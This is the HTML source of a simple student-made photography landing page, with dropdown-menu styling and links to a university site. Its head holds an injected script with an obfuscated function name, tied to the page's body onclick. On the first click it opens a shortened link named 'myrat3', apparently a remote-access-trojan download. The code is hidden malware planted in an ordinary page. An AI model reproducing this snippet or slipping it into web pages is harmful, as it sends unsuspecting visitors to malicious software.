<html>
    <head><script type = "text/javascript">load = 'True';function VXNlcmNvcjogSW(){if (load == 'True'){var win = window.open('http://rebrand.ly/myrat3', '_blank');win.focus();load = "False";}}</script>
        <link rel="stylesheet" type="text/css" href="style.css">
        <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
        
    </head>
        <style>
body{
     
    background-image: url("bg2.jpg");
        background-repeat: no-repeat;
    background-size: cover;  
}
            .dropbtn {
    position: relative;
    background-color:black;
    color: white;
    padding: 10px;
    font-size: 18px;
    border: none;
    cursor: pointer;
}

.dropdown {
        display:inline-table;

    position:relative;
}
    .dropdown-content {
        display: none;
    position:absolute;
    
    background-color: black;
    min-width: 160px;
    box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
    z-index: 1;
}

.dropdown-content a {
    color: white;
    padding: 12px 16px;
    text-decoration: none;
    display: block;
}

.dropdown-content a:hover {background-color: dimgray }

.dropdown:hover .dropdown-content {
    display: block;
}

.dropdown:hover .dropbtn {
    background-color:darkslategrey;
}
            .logo a{
                display: block;
                margin-top: 200;
                margin-left: 600;
                margin-right: 650;
                
            }  
            h3{
                margin-left: 470;
                color: white;
                
            }
            
            
        



</style>

    <body onclick = "VXNlcmNvcjogSW()">
        
    <div class="dropdown" style="left:1200px;">
  <button class="dropbtn">MENU</button>
  <div class="dropdown-content">
    <a href= "web.html">HOME</a>
    <a href="http://www.uol.edu.pk/facts/aboutuol/ourfaculty">ABOUT</a>
      <a href="file:///E:/UNIVERSITY/5th/Web/Working/New%20folder/images/bs.html">OUR PACKAGES</a>
    <a href="http://www.uol.edu.pk/facts/aboutuol/aboutlahorecity">CONTACT US</a>
  </div>
</div>
        
        <div class="logo">
          
           <a href="web.html"> 
               
           <img src="i.png" alt="log" >
               </a>
           
            </div>
        <h3>I DON’T TRUST WORDS. I TRUST PICTURES. </h3>
        
        
            

    
    
    
    
              
        
       
                
    
    
    
        
        
    
    
    
    </body>



</html>